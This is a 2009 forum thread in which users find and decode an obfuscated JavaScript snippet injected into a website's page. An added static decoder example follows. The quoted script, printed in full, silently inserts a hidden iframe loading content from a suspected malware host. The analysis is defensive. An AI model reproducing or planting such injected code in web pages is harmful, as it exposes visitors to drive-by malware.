Free Republic
Browse · Search
Smoky Backroom
Topics · Post Article

To: Boucheau
There is a piece of obfuscated JavaScript at the end of the body element, apparently added mechanically right above the /body end tag, below the page designer's signature, which decodes itself and executes something hidden upon loading of the page. I have the Firefox NoScript add-on, which blocks scripts unless explicitly enabled, so it didn't run the code on my machine. If someone has half an hour to run the code, display the output of the decoder (the function YuLQmW below) on the obfuscated strings and see what it does, here it is:

<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

<script > function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var
SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';
for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){
AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf
+= String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;}
function hjgksr(){var GncOozzc=new Function("QtBFdMu",
"return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f,
'U','299U288U300U314U290U298U289U315U')+"."+
YuLQmW(-0x7-0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var
zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c-0x14);
zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c-0x25+0x0+0x4e,
'V','181V224V239V251V232V228V236V169V254V224V237V253V225
V180V184V169V225V236V224V238V225V253V180V184V169V235V230
V251V237V236V251V180V185V169V239V251V232V228V236V235V230
V251V237V236V251V180V185V169V250V251V234V180V174V225V253
V253V249V179V166V166V250V236V234V252V251V224V253V240V164
V232V229V236V251V253V250V167V234V231V166V234V240V235V236
V251V166V224V231V167V234V238V224V182V189V174V183V181V166
V224V239V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load',hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);} </script > </body> </html>

1,795 posted on 08/02/2009 9:58:37 AM PDT by nightlight7
[ Post Reply | Private Reply | To 255 | View Replies ]


To: nightlight7
It adds this code to document.body:
<iframe width=1 height=1 border=0 frameborder=0
 src='http://security-alerts.cn/cyber/in.cgi?4'></iframe>
Looks like it’s including some malware code from another site and puts it into an iframe. Perhaps a key logger or something. Yes, looks very infected…
2,069 posted on 08/02/2009 11:07:39 AM PDT by cartan
[ Post Reply | Private Reply | To 1795 | View Replies ]
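
The decoding requested in post 1,795 can be done statically, without letting the page's script run. The following is an added example, not part of either post: `evalKey`, `decode` and `decodeAll` are hypothetical helper names, and the sample strings are copied from the script quoted above (only the first eight tokens of the long 'V' string are included).

```javascript
// Static decoder for the XOR-and-delimiter scheme used by YuLQmW above.
// Nothing here calls eval or new Function, and no DOM is touched.

// Sum a key expression such as "-0x7-0xe+0x14+0x3b1" without eval.
// Only signed hex terms are accepted; anything else is rejected.
function evalKey(expr) {
  const compact = expr.replace(/\s+/g, '');
  const terms = compact.match(/[+-]?0x[0-9a-f]+/gi) || [];
  if (terms.join('') !== compact) {
    throw new Error('unsupported key expression: ' + expr);
  }
  return terms.reduce((sum, t) => sum + Number.parseInt(t, 16), 0);
}

// Split on the delimiter, XOR each decimal token with the key, and
// rebuild the string. Empty tokens (the trailing delimiter) are skipped,
// and whitespace from line wrapping inside the literal is tolerated.
function decode(key, delim, data) {
  return data
    .split(delim)
    .filter((tok) => tok.trim() !== '')
    .map((tok) => {
      if (!/^\s*\d+\s*$/.test(tok)) {
        throw new Error('non-numeric token: ' + JSON.stringify(tok));
      }
      return String.fromCharCode(Number(tok) ^ key);
    })
    .join('');
}

// Key expressions, delimiters and data copied from the quoted script.
const SAMPLES = [
  { key: '-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f', delim: 'U',
    data: '299U288U300U314U290U298U289U315U' },
  { key: '-0x7-0xe+0x14+0x3b1', delim: 'G', data: '978G991G980G969G' },
  // First eight tokens only of the long 'V' string.
  { key: '0x4+0x30+0x2c-0x25+0x0+0x4e', delim: 'V',
    data: '181V224V239V251V232V228V236V169V' },
];

function decodeAll(samples) {
  return samples.map((s) => decode(evalKey(s.key), s.delim, s.data));
}

// Print the results as inert JSON strings for inspection.
for (const text of decodeAll(SAMPLES)) console.log(JSON.stringify(text));
```

The first two strings decode to the object the script appends to, and the third begins the markup reported in post 2,069.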
